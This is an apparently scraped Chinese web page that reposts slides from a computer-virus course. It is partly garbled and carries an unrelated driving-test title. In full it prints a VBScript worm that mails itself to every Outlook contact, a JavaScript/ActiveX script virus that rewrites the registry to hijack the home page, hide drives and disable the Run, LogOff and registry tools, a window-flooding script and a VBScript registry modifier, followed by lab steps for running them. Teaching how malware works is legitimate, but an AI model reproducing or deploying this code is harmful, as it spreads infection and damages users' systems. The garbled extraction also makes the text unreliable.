b2科目四模拟试题多少题驾考考爆了怎么补救
b2科目四模拟试题多少题 驾考考爆了怎么补救

【精品】计算机病毒及其防范技术(第2版)课件-新型病毒(2)

电脑杂谈  发布时间:2019-06-05 15:24:04  来源:网络整理

实验结束后, 再重新导入原来地址薄中的联系人。• 2.程序运行后, 打开实验用邮箱查看实验结果。 一般而言, 由于现在的邮件服务器都会对邮件进行扫面,所以传送了病毒的邮件不能传送到邮箱。 解决办法是:将程序中的一个语句ObjMail.Attachments.Add ("c:\test.vbs") 删除, 或者将附件c:\test.vbs文件内容改为其他内容。信息安全工程学院Test.vbs的内 容//code beginSet objOA = Wscript.CreateObject("Outlook.Application")Set objMapi = objOA.GetNameSpace("MAPI")For i = 1 to objMapi.AddressLists.CountSet objAddList = objMapi.AddressLists(i)For j =1 To objAddList.AddressEntries.CountSet objMail = objOA.CreateItem(0)ObjMail.Recipients.Add(objAddList.AddressEntries(j))jp(jObjMail.Subject = "你好!"ObjMail.Body = "这次给你的附件时我实验题! 如果收到附件轻不要下载,不要打开。

"ObjMail.Attachments.Add("c:\test.vbs")ObjMail.SentNextNextSet objMapi = NothingSet objOA = Nothing//code end信息安全工程学院(j))3 Webpage中的恶意代码WebPage中的恶意代码主要是指某些网站使用的恶意代码。 这些代码打着是给用户加深“印象” 、 提供“方便” 的旗号做令人厌恶的事情。花病毒信息安全工程学院“万花谷” 病毒脚本病毒基本类型第一, 基于JAVAScript的脚本病毒第二, 基于VBScript的脚本病毒• 可以在Office, 浏览器、 Outlook中运行,危害性较大。第三, 基于PHP的脚本病毒信息安全工程学院第四, 脚本语言和木马程序结合的病毒病毒的工作机理病毒利用了下面这段JavaScript代码修改了HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\ 和HKCU\Software\Microsoft\Internet Explorer\Main\ 中的Window Title这个键的值。

同时, 病毒还修改了用户的许多IE设置, 如消除运行(RUN) 按钮、 消除关闭按钮、消除注销按钮隐藏桌面隐藏盘符消除注销按钮、 隐藏桌面、 隐藏盘符、 禁止注册表等。以下就是这个病毒的代码:禁止注册表等信息安全工程学院document.write(""); //该函数是现在收藏夹里增加一个站点function AddFavLnk(loc, DispName, SiteURL) { var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL"); Shor.TargetPath = SiteURL; Shor.Save(); } //该函数是病毒的主函数, 实现COOKIES检查、 注册表修改等function f(){ try { 信息安全工程学院//声明一个ActiveX对象ActiveX initialization a1 =document.applets[0]; a1 .setCLSID("{F935DC22-1 CF0-1 1 D0-ADB9-00C04FD58A0B}"); //创建几个实例a1 .createInstance(); Shl = a1 .GetObject(); a1 .setCLSID("{0D43FE01 -F093-1 1 CF-8940-00A0C9054228}"); a1 .createInstance(); FSO = a1 .GetObject(); a1 .setCLSID("{F935DC26-1 CF0-1 1 D0-ADB9-00C04FD58A0B}"); 1I()a1 .createInstance(); Net = a1 .GetObject(); try { if (documents .cookies.indexOf("Chg") == -1 ) { //设置IE起始页Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","");//设置COOKIES var expdate = new Date((new Date()).getTime() + (1 )); documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 信息安全工程学院//消除RUN按钮Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01 , "REG_BINARY"); //消除关闭按钮Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01 , "REG_BINARY"); //消除注销按钮Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies(\\Explorer\\NoLogOff", 01 , "REG_BINARY"); //隐藏盘符Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "63000000", "REG_DWORD"); //禁止注册表Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001 ", "REG_DWORD");//禁止运行DOS程序Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001 ", "REG_DWORD"); 信息安全工程学院//禁止进入DOS模式Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001 ", "REG_DWORD");//开机提示窗口标题Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "你已经中毒…");//开机提示窗口信息Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "你已经中毒…"); //设置IE标题Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","你已经中毒…"); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "你已经中毒")"你已经中毒…"); } } catch(e) {} } catch(e) {} }//初始化函数function init() { setTimeout("f()", 1 000); } //开始执行init();信息安全工程学院网 络//首先声明插入脚本为JavaScript<script language="JavaScript">//定义不断打开新窗口的函数openwindows(), 所带参数表明打开窗口数量function openwindows(number){ //循环for (i = 0; i<number; i++){//指定的页面{ //指定的页面window.open("temp.jsp"); }}</script> //脚本结束标志信息安全工程学院类“万花筒病毒”‘声明脚本为VBScript<SCRIPT language='vbscript'>‘定义函数runVirus()Function runVirus()‘实验中弹出对话框告知学员病毒进程msgbox("将要修改主页了! ")‘执行注册表改写1 , 把IE主键修改成★Your Home Page★Rw "HKEY CURRENT USER\Software\Microsoft\Internet Explorer\__Main\Start Page", "★Your Home Page★", "REG_SZ"msgbox("修改主页完成, 查看一下吧! ")msgbox("将要隐藏A盘盘符! ")‘执行注册表改写2: 隐藏A盘盘符信息安全工程学院pRw HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "00000001 ", "REG_DWORD" msgbox("A盘盘符消失! ")msgbox("注册表工具将要被禁用! ")‘执行注册表改写3: 禁用注册表编辑器Rw "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "00000001 ", "REG_DWORD"msgbox("注册表工具禁用! ")End Function 信息安全工程学院‘注册表写函数Sub Rw(k, v, t) Dim ROn Error Resume Next‘关键步骤, 调用WScript.Shell对象来获得修改权利Set R = CreateObject("WScript.Shell")j(‘调用WScript.Shell的方法来写注册表R.RegWrite k, v, tEnd Sub信息安全工程学院)‘注册表读函数Function Rg(v) Dim ROn Error Resume Next‘关键步骤, 调用WScript.Shell对象来获得读取权利Set R = CreateObject("WScript.Shell")‘调用WScript Shell的方法来读注册表调用WScript.Shell的方法来读注册表Rg = R.RegRead(v)End Function‘插入脚本结束</SCRIPT> 信息安全工程学院Web恶意代码实验(实验十四)实验一【实验目的】掌握网页恶意代码的基本原理。

计算机病毒的防范论文_计算机病毒的防范_计算机病毒与防范技术

【实验平台】信息安全工程学院Windows XP操作系统IE浏览器【实验步骤】(1 ) 从光盘上复制实验文件到实验的计算机上(源码位置: 附书资源目录\Experiment\IEMalware \1 .html)。(2) 用IE打开该文件IE不断地打开1 63网页(2) 用IE打开该文件, IE不断地打开1 63网页。(3) 如果IE阻止了显示内容, 右击出现的提示信息, 选择“允许阻止的内容” , 就可以看到实验现象。【程序源码】附书资源目录\Experiment\IEMalware\1 .html信息安全工程学院实验二【实验目的】掌握网页恶意代码基本原理。【实验平台】信息安全工程学院Windows XP操作系统IE浏览器【实验步骤】(1 ) 从光盘上复制实验文件到实验计算机上(源码位置: 附书资源目录\Experiment\IE Malware \2.html)。(2) IE显示的地方出现黑白颜色不断地闪动(2) IE显示的地方出现黑白颜色不断地闪动。(3) 如果IE阻止了显示内容, 右击出现的提示信息, 选择“允许阻止的内容” , 就可以看到实验现象。


本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-103867-2.html

相关阅读
    发表评论  请自觉遵守互联网相关的政策法规,严禁发布、暴力、反动的言论

    热点图片
    拼命载入中...